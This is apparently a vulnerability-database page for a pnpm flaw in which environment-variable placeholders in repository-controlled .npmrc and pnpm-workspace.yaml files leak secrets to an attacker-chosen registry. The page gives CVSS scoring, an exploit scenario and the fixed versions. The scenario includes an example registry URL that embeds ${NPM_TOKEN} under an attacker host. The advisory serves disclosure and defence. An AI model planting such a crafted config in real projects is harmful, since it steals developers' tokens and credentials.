Severity by source
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
AV:N as the malicious repo is network-delivered; PR:N since attacker owns the repo not the victim system; UI:R for required clone-and-run; C:H for high-value secret exfiltration; no integrity or availability impact.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
Lifecycle Timeline
2DescriptionCVE.org
pnpm is a package manager. Prior to 10.34.2 and 11.5.3, pnpm and pacquet expanded ${ENV_VAR} placeholders from repository-controlled .npmrc and pnpm-workspace.yaml into registry request destinations and registry credentials. A malicious repository could cause dependency resolution to send victim environment secrets to an attacker-selected registry before lifecycle scripts run. This vulnerability is fixed in 10.34.2 and 11.5.3.
AnalysisAI
{ENV_VAR} placeholders from repository-controlled .npmrc and pnpm-workspace.yaml files into registry request URLs and credentials. When a developer clones and runs pnpm install in a crafted repository, the package manager resolves dependency requests against attacker-controlled registry endpoints, transmitting whatever environment variables (tokens, API keys, credentials) the victim has set in their shell. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The victim must clone a repository controlled or influenced by the attacker and then invoke pnpm dependency resolution (e.g., pnpm install, pnpm fetch, or equivalent) within that repository directory. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 score of 6.5 with vector AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N accurately reflects the threat profile: network-delivered, low complexity, no attacker privileges needed, but requiring user interaction (UI:R). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker publishes or contributes to a repository containing a crafted .npmrc or pnpm-workspace.yaml that sets the registry URL to https://attacker.example.com/${NPM_TOKEN}/ or similar. When a victim developer clones the repository and runs pnpm install - a routine step in onboarding, CI pipelines, or reviewing pull requests - pnpm expands the environment variable, transmits the token value to the attacker's server in the outbound HTTP request path, and the attacker captures it from their server logs. … |
| Remediation | Upgrade pnpm to version 10.34.2 or later on the 10.x release line, or to 11.5.3 or later on the 11.x release line - these are the vendor-confirmed fixed versions per the GitHub Security Advisory GHSA-3qhv-2rgh-x77r at https://github.com/pnpm/pnpm/security/advisories/GHSA-3qhv-2rgh-x77r. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Arbitrary code execution in the pnpm package manager (versions 10.0.0 through 10.25) lets a git-hosted dependency run co
Path traversal in pnpm before 10.34.0 and 11.4.0 lets a malicious registry package smuggle '../' segments inside a trans
Arbitrary code execution in the pnpm package manager (versions prior to 10.34.2 and 11.5.3) lets a malicious repository
Arbitrary command execution in pnpm before 10.34.2 and 11.5.3 allows a malicious repository to run attacker-chosen nativ
Supply-chain integrity bypass in pnpm package manager (versions ≤10.26.2, per description; GHSA states <10.26.0) allows
Integrity-check bypass in the pnpm package manager (versions before 10.34.0/10.34.1 and 11.0.0-11.3.x) lets tampered pac
{VAR} substitution inside .npmrc tokenHelper settings combined with spawnSync invoked with shell: true. The bug primaril
Arbitrary file write and deletion in pnpm package manager (versions prior to 10.34.0 and 11.4.0) lets a malicious contri
Arbitrary command execution in pnpm before 10.34.0 and 11.4.0 allows a malicious lockfile to run code on a developer's m
Path traversal in pnpm's `pnpm stage download` command (versions 11.3.0 through 11.5.2) lets a malicious or compromised
Path traversal in pnpm's global package management flows allows deletion of the global bin directory or its parent when
pnpm is a package manager. Rated medium severity (CVSS 6.5), this vulnerability is remotely exploitable, no authenticati
Same weakness CWE-200 – Information Exposure
View allSame technique Information Disclosure
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-39498
GHSA-3qhv-2rgh-x77r